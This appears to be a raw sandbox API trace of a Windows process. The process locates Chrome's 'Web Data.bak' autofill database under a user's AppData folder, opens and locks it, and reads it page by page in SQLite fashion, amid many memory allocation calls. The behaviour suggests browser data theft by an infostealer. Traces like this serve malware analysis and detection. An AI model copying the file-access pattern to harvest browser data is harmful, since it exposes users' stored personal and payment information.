	[0219.439] VirtualFree (lpAddress=0x27d0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.439] VirtualFree (lpAddress=0x27a0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.439] VirtualFree (lpAddress=0x2770000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.440] VirtualFree (lpAddress=0x2730000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.440] VirtualFree (lpAddress=0x2750000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.440] VirtualFree (lpAddress=0x26a0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.440] VirtualFree (lpAddress=0x26c0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.441] VirtualFree (lpAddress=0x26d0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.441] VirtualFree (lpAddress=0x2700000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.441] VirtualFree (lpAddress=0x26e0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.442] VirtualFree (lpAddress=0x2720000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.442] VirtualFree (lpAddress=0x26f0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.442] VirtualFree (lpAddress=0x2740000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.443] VirtualFree (lpAddress=0x26b0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.443] VirtualFree (lpAddress=0x2670000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.443] VirtualFree (lpAddress=0x2690000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.443] VirtualFree (lpAddress=0x25a0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.444] VirtualFree (lpAddress=0x25c0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.444] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.444] VirtualFree (lpAddress=0x25e0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.445] VirtualFree (lpAddress=0x25f0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.445] VirtualFree (lpAddress=0x2600000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.445] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.445] VirtualFree (lpAddress=0x2610000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.467] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.467] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.467] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.468] VirtualFree (lpAddress=0x2680000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.468] VirtualFree (lpAddress=0x2660000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.468] VirtualFree (lpAddress=0x2580000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.474] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x2c) returned 0x38a5d0
	[0219.474] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.474] SHGetSpecialFolderPathA (in: hwnd=0x0, pszPath=0x1b5f290, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Local") returned 1
	[0219.474] lstrlenA (lpString="C:\\Users\\2XC7u663GxWc\\AppData\\Local") returned 35
	[0219.474] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x1000) returned 0x3a4fd0
	[0219.475] lstrlenA (lpString="\\Google\\Chrome\\User Data\\Default\\Web Data.bak") returned 45
	[0219.475] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x1000) returned 0x3a5fd8
	[0219.475] VirtualAlloc (lpAddress=0x0, dwSize=0x1d0, flAllocationType=0x3000, flProtect=0x4) returned 0x20000
	[0219.475] VirtualAlloc (lpAddress=0x0, dwSize=0x1c, flAllocationType=0x3000, flProtect=0x4) returned 0xe0000
	[0219.475] VirtualAlloc (lpAddress=0x0, dwSize=0x43, flAllocationType=0x3000, flProtect=0x4) returned 0x360000
	[0219.475] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x470000
	[0219.475] VirtualAlloc (lpAddress=0x0, dwSize=0x43, flAllocationType=0x3000, flProtect=0x4) returned 0x520000
	[0219.476] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x530000
	[0219.476] VirtualAlloc (lpAddress=0x0, dwSize=0x42, flAllocationType=0x3000, flProtect=0x4) returned 0x540000
	[0219.476] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x550000
	[0219.476] VirtualAlloc (lpAddress=0x0, dwSize=0x52, flAllocationType=0x3000, flProtect=0x4) returned 0x5a0000
	[0219.476] VirtualAlloc (lpAddress=0x0, dwSize=0x30, flAllocationType=0x3000, flProtect=0x4) returned 0x5b0000
	[0219.477] VirtualAlloc (lpAddress=0x0, dwSize=0x54, flAllocationType=0x3000, flProtect=0x4) returned 0x5c0000
	[0219.477] VirtualAlloc (lpAddress=0x0, dwSize=0x822, flAllocationType=0x3000, flProtect=0x4) returned 0x5d0000
	[0219.477] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x5a0000, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 81
	[0219.477] VirtualAlloc (lpAddress=0x0, dwSize=0xa2, flAllocationType=0x3000, flProtect=0x4) returned 0x5e0000
	[0219.477] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x5a0000, cbMultiByte=-1, lpWideCharStr=0x5e0000, cchWideChar=81 | out: lpWideCharStr="C:\\Users\\2XC7u663GxWc\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data.bak") returned 81
	[0219.477] GetFullPathNameW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data.bak", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x51
	[0219.477] VirtualAlloc (lpAddress=0x0, dwSize=0xa8, flAllocationType=0x3000, flProtect=0x4) returned 0x5f0000
	[0219.478] GetFullPathNameW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data.bak", nBufferLength=0x54, lpBuffer=0x5f0000, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data.bak", lpFilePart=0x0) returned 0x50
	[0219.478] VirtualFree (lpAddress=0x5e0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.478] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\2XC7u663GxWc\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data.bak", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 81
	[0219.478] VirtualAlloc (lpAddress=0x0, dwSize=0x51, flAllocationType=0x3000, flProtect=0x4) returned 0x5e0000
	[0219.478] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\2XC7u663GxWc\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data.bak", cchWideChar=-1, lpMultiByteStr=0x5e0000, cbMultiByte=81, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\2XC7u663GxWc\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data.bak", lpUsedDefaultChar=0x0) returned 81
	[0219.478] VirtualFree (lpAddress=0x5f0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.478] VirtualFree (lpAddress=0x5e0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.478] VirtualAlloc (lpAddress=0x0, dwSize=0x2f2, flAllocationType=0x3000, flProtect=0x4) returned 0x5e0000
	[0219.478] VirtualFree (lpAddress=0x5d0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.479] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x5e01f0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 81
	[0219.479] VirtualAlloc (lpAddress=0x0, dwSize=0xa2, flAllocationType=0x3000, flProtect=0x4) returned 0x5d0000
	[0219.479] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x5e01f0, cbMultiByte=-1, lpWideCharStr=0x5d0000, cchWideChar=81 | out: lpWideCharStr="C:\\Users\\2XC7u663GxWc\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data.bak") returned 81
	[0219.479] GetFileAttributesExW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data.bak" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\local\\google\\chrome\\user data\\default\\web data.bak"), fInfoLevelId=0x0, lpFileInformation=0x1b5ecc4 | out: lpFileInformation=0x1b5ecc4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x64aa7ee0, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x64aa7ee0, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0xcc5c0240, ftLastWriteTime.dwHighDateTime=0x1d348db, nFileSizeHigh=0x0, nFileSizeLow=0x10000)) returned 1
	[0219.479] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data.bak" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\local\\google\\chrome\\user data\\default\\web data.bak"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114
	[0219.479] VirtualFree (lpAddress=0x5d0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.479] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x4) returned 0x5d0000
	[0219.479] VirtualQuery (in: lpAddress=0x5d0000, lpBuffer=0x1b5ed08, dwLength=0x1c | out: lpBuffer=0x1b5ed08*(BaseAddress=0x5d0000, AllocationBase=0x5d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.480] VirtualAlloc (lpAddress=0x0, dwSize=0x70, flAllocationType=0x3000, flProtect=0x4) returned 0x5f0000
	[0219.480] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1610000
	[0219.480] ReadFile (in: hFile=0x114, lpBuffer=0x1b5edd0, nNumberOfBytesToRead=0x64, lpNumberOfBytesRead=0x1b5edbc, lpOverlapped=0x1b5ed80 | out: lpBuffer=0x1b5edd0*, lpNumberOfBytesRead=0x1b5edbc*=0x64, lpOverlapped=0x1b5ed80) returned 1
	[0219.480] VirtualAlloc (lpAddress=0x0, dwSize=0x800, flAllocationType=0x3000, flProtect=0x4) returned 0x1620000
	[0219.480] VirtualQuery (in: lpAddress=0x1620000, lpBuffer=0x1b5ed60, dwLength=0x1c | out: lpBuffer=0x1b5ed60*(BaseAddress=0x1620000, AllocationBase=0x1620000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.481] VirtualAlloc (lpAddress=0x0, dwSize=0x70, flAllocationType=0x3000, flProtect=0x4) returned 0x1630000
	[0219.481] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1640000
	[0219.481] VirtualFree (lpAddress=0x1610000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.481] VirtualFree (lpAddress=0x5f0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.481] VirtualQuery (in: lpAddress=0x5d0000, lpBuffer=0x1b5ed64, dwLength=0x1c | out: lpBuffer=0x1b5ed64*(BaseAddress=0x5d0000, AllocationBase=0x5d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.481] VirtualFree (lpAddress=0x5d0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.481] VirtualAlloc (lpAddress=0x0, dwSize=0x54, flAllocationType=0x3000, flProtect=0x4) returned 0x5d0000
	[0219.482] VirtualAlloc (lpAddress=0x0, dwSize=0x54, flAllocationType=0x3000, flProtect=0x4) returned 0x5f0000
	[0219.482] VirtualAlloc (lpAddress=0x0, dwSize=0x22, flAllocationType=0x3000, flProtect=0x4) returned 0x1610000
	[0219.482] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x1650000
	[0219.482] VirtualAlloc (lpAddress=0x0, dwSize=0x1d4c0, flAllocationType=0x3000, flProtect=0x4) returned 0x1660000
	[0219.482] VirtualQuery (in: lpAddress=0x1660000, lpBuffer=0x1b5ee30, dwLength=0x1c | out: lpBuffer=0x1b5ee30*(BaseAddress=0x1660000, AllocationBase=0x1660000, AllocationProtect=0x4, RegionSize=0x1e000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.484] VirtualFree (lpAddress=0x5a0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.484] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x5a0000
	[0219.484] VirtualAlloc (lpAddress=0x0, dwSize=0x50, flAllocationType=0x3000, flProtect=0x4) returned 0x1680000
	[0219.485] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x1690000
	[0219.485] VirtualAlloc (lpAddress=0x0, dwSize=0x80, flAllocationType=0x3000, flProtect=0x4) returned 0x16a0000
	[0219.485] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x16f0000
	[0219.485] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x1700000
	[0219.486] VirtualAlloc (lpAddress=0x0, dwSize=0x11, flAllocationType=0x3000, flProtect=0x4) returned 0x1710000
	[0219.486] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x4) returned 0x1720000
	[0219.486] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x1730000
	[0219.486] VirtualAlloc (lpAddress=0x0, dwSize=0xe0, flAllocationType=0x3000, flProtect=0x4) returned 0x1740000
	[0219.486] VirtualAlloc (lpAddress=0x0, dwSize=0x3fc, flAllocationType=0x3000, flProtect=0x4) returned 0x1750000
	[0219.487] VirtualQuery (in: lpAddress=0x1750000, lpBuffer=0x1b5d86c, dwLength=0x1c | out: lpBuffer=0x1b5d86c*(BaseAddress=0x1750000, AllocationBase=0x1750000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.487] VirtualFree (lpAddress=0x1750000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.487] VirtualFree (lpAddress=0x1740000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.487] LockFileEx (in: hFile=0x114, dwFlags=0x3, dwReserved=0x0, nNumberOfBytesToLockLow=0x1, nNumberOfBytesToLockHigh=0x0, lpOverlapped=0x1b5e1b0 | out: lpOverlapped=0x1b5e1b0) returned 1
	[0219.487] LockFileEx (in: hFile=0x114, dwFlags=0x1, dwReserved=0x0, nNumberOfBytesToLockLow=0x1fe, nNumberOfBytesToLockHigh=0x0, lpOverlapped=0x1b5e19c | out: lpOverlapped=0x1b5e19c) returned 1
	[0219.487] UnlockFileEx (in: hFile=0x114, dwReserved=0x0, nNumberOfBytesToUnlockLow=0x1, nNumberOfBytesToUnlockHigh=0x0, lpOverlapped=0x1b5e1b4 | out: lpOverlapped=0x1b5e1b4) returned 1
	[0219.487] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x5e0242, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 89
	[0219.487] VirtualAlloc (lpAddress=0x0, dwSize=0xb2, flAllocationType=0x3000, flProtect=0x4) returned 0x1740000
	[0219.487] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x5e0242, cbMultiByte=-1, lpWideCharStr=0x1740000, cchWideChar=89 | out: lpWideCharStr="C:\\Users\\2XC7u663GxWc\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data.bak-journal") returned 89
	[0219.487] GetFileAttributesExW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data.bak-journal" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\local\\google\\chrome\\user data\\default\\web data.bak-journal"), fInfoLevelId=0x0, lpFileInformation=0x1b5e1a8 | out: lpFileInformation=0x1b5e1a8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0219.487] GetLastError () returned 0x2
	[0219.487] VirtualFree (lpAddress=0x1740000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.488] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x5e029b, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 85
	[0219.488] VirtualAlloc (lpAddress=0x0, dwSize=0xaa, flAllocationType=0x3000, flProtect=0x4) returned 0x1740000
	[0219.488] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x5e029b, cbMultiByte=-1, lpWideCharStr=0x1740000, cchWideChar=85 | out: lpWideCharStr="C:\\Users\\2XC7u663GxWc\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data.bak-wal") returned 85
	[0219.488] GetFileAttributesExW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data.bak-wal" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\local\\google\\chrome\\user data\\default\\web data.bak-wal"), fInfoLevelId=0x0, lpFileInformation=0x1b5e1d8 | out: lpFileInformation=0x1b5e1d8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0219.488] GetLastError () returned 0x2
	[0219.488] VirtualFree (lpAddress=0x1740000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.488] GetFileSize (in: hFile=0x114, lpFileSizeHigh=0x1b5e1f4 | out: lpFileSizeHigh=0x1b5e1f4*=0x0) returned 0x10000
	[0219.488] VirtualAlloc (lpAddress=0x0, dwSize=0xac80, flAllocationType=0x3000, flProtect=0x4) returned 0x1740000
	[0219.488] VirtualQuery (in: lpAddress=0x1740000, lpBuffer=0x1b5e17c, dwLength=0x1c | out: lpBuffer=0x1b5e17c*(BaseAddress=0x1740000, AllocationBase=0x1740000, AllocationProtect=0x4, RegionSize=0xb000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.489] ReadFile (in: hFile=0x114, lpBuffer=0x174a3e0, nNumberOfBytesToRead=0x800, lpNumberOfBytesRead=0x1b5e1d4, lpOverlapped=0x1b5e198 | out: lpBuffer=0x174a3e0*, lpNumberOfBytesRead=0x1b5e1d4*=0x800, lpOverlapped=0x1b5e198) returned 1
	[0219.489] VirtualAlloc (lpAddress=0x0, dwSize=0xe0, flAllocationType=0x3000, flProtect=0x4) returned 0x1750000
	[0219.489] VirtualAlloc (lpAddress=0x0, dwSize=0x3fc, flAllocationType=0x3000, flProtect=0x4) returned 0x1760000
	[0219.489] VirtualQuery (in: lpAddress=0x1760000, lpBuffer=0x1b5d71c, dwLength=0x1c | out: lpBuffer=0x1b5d71c*(BaseAddress=0x1760000, AllocationBase=0x1760000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.490] VirtualAlloc (lpAddress=0x0, dwSize=0xf0, flAllocationType=0x3000, flProtect=0x4) returned 0x1a80000
	[0219.490] VirtualAlloc (lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x4) returned 0x1a90000
	[0219.490] VirtualQuery (in: lpAddress=0x1a90000, lpBuffer=0x1b5d6d4, dwLength=0x1c | out: lpBuffer=0x1b5d6d4*(BaseAddress=0x1a90000, AllocationBase=0x1a90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.490] VirtualAlloc (lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x4) returned 0x1aa0000
	[0219.490] VirtualQuery (in: lpAddress=0x1aa0000, lpBuffer=0x1b5d6d4, dwLength=0x1c | out: lpBuffer=0x1b5d6d4*(BaseAddress=0x1aa0000, AllocationBase=0x1aa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.490] VirtualAlloc (lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x4) returned 0x1ab0000
	[0219.490] VirtualQuery (in: lpAddress=0x1ab0000, lpBuffer=0x1b5d6d4, dwLength=0x1c | out: lpBuffer=0x1b5d6d4*(BaseAddress=0x1ab0000, AllocationBase=0x1ab0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.491] VirtualAlloc (lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x4) returned 0x1ac0000
	[0219.491] VirtualQuery (in: lpAddress=0x1ac0000, lpBuffer=0x1b5d6d4, dwLength=0x1c | out: lpBuffer=0x1b5d6d4*(BaseAddress=0x1ac0000, AllocationBase=0x1ac0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.492] VirtualAlloc (lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x4) returned 0x1ad0000
	[0219.492] VirtualQuery (in: lpAddress=0x1ad0000, lpBuffer=0x1b5d6d4, dwLength=0x1c | out: lpBuffer=0x1b5d6d4*(BaseAddress=0x1ad0000, AllocationBase=0x1ad0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.492] VirtualAlloc (lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x4) returned 0x1ae0000
	[0219.492] VirtualQuery (in: lpAddress=0x1ae0000, lpBuffer=0x1b5d6d4, dwLength=0x1c | out: lpBuffer=0x1b5d6d4*(BaseAddress=0x1ae0000, AllocationBase=0x1ae0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.492] VirtualAlloc (lpAddress=0x0, dwSize=0x2d, flAllocationType=0x3000, flProtect=0x4) returned 0x1af0000
	[0219.499] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x3000, flProtect=0x4) returned 0x1b00000
	[0219.500] VirtualAlloc (lpAddress=0x0, dwSize=0x388, flAllocationType=0x3000, flProtect=0x4) returned 0x1b10000
	[0219.500] VirtualQuery (in: lpAddress=0x1b00000, lpBuffer=0x1b5d648, dwLength=0x1c | out: lpBuffer=0x1b5d648*(BaseAddress=0x1b00000, AllocationBase=0x1b00000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.500] VirtualQuery (in: lpAddress=0x1b00000, lpBuffer=0x1b5d644, dwLength=0x1c | out: lpBuffer=0x1b5d644*(BaseAddress=0x1b00000, AllocationBase=0x1b00000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.500] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x1b60000
	[0219.500] VirtualFree (lpAddress=0x1b00000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.500] VirtualAlloc (lpAddress=0x0, dwSize=0x48, flAllocationType=0x3000, flProtect=0x4) returned 0x1b00000
	[0219.501] VirtualAlloc (lpAddress=0x0, dwSize=0x48, flAllocationType=0x3000, flProtect=0x4) returned 0x1b70000
	[0219.501] VirtualFree (lpAddress=0x1b70000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.501] VirtualAlloc (lpAddress=0x0, dwSize=0x4a, flAllocationType=0x3000, flProtect=0x4) returned 0x1b70000
	[0219.501] VirtualFree (lpAddress=0x1b70000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.501] VirtualQuery (in: lpAddress=0x1b60000, lpBuffer=0x1b5d560, dwLength=0x1c | out: lpBuffer=0x1b5d560*(BaseAddress=0x1b60000, AllocationBase=0x1b60000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.501] VirtualQuery (in: lpAddress=0x1b60000, lpBuffer=0x1b5d55c, dwLength=0x1c | out: lpBuffer=0x1b5d55c*(BaseAddress=0x1b60000, AllocationBase=0x1b60000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.502] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x4) returned 0x1b70000
	[0219.502] VirtualFree (lpAddress=0x1b60000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.502] VirtualFree (lpAddress=0x1af0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.502] VirtualFree (lpAddress=0x1b00000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.502] VirtualFree (lpAddress=0x1b10000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.502] VirtualFree (lpAddress=0x1b70000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.503] ReadFile (in: hFile=0x114, lpBuffer=0x1749b40, nNumberOfBytesToRead=0x800, lpNumberOfBytesRead=0x1b5df08, lpOverlapped=0x1b5decc | out: lpBuffer=0x1749b40*, lpNumberOfBytesRead=0x1b5df08*=0x800, lpOverlapped=0x1b5decc) returned 1
	[0219.503] VirtualAlloc (lpAddress=0x0, dwSize=0x5, flAllocationType=0x3000, flProtect=0x4) returned 0x1af0000
	[0219.503] VirtualAlloc (lpAddress=0x0, dwSize=0x50, flAllocationType=0x3000, flProtect=0x4) returned 0x1b00000
	[0219.503] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x1b10000
	[0219.503] VirtualAlloc (lpAddress=0x0, dwSize=0x80, flAllocationType=0x3000, flProtect=0x4) returned 0x1b60000
	[0219.504] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x1b70000
	[0219.504] VirtualAlloc (lpAddress=0x0, dwSize=0x34, flAllocationType=0x3000, flProtect=0x4) returned 0x1b80000
	[0219.504] VirtualAlloc (lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x4) returned 0x1b90000
	[0219.504] VirtualAlloc (lpAddress=0x0, dwSize=0x70, flAllocationType=0x3000, flProtect=0x4) returned 0x1ba0000
	[0219.505] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x1bb0000
	[0219.505] VirtualFree (lpAddress=0x1b80000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.505] VirtualFree (lpAddress=0x1b90000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.505] VirtualFree (lpAddress=0x1b70000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.505] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x1b70000
	[0219.506] VirtualAlloc (lpAddress=0x0, dwSize=0x34, flAllocationType=0x3000, flProtect=0x4) returned 0x1b80000
	[0219.506] VirtualAlloc (lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x4) returned 0x1b90000
	[0219.506] VirtualAlloc (lpAddress=0x0, dwSize=0x70, flAllocationType=0x3000, flProtect=0x4) returned 0x1bc0000
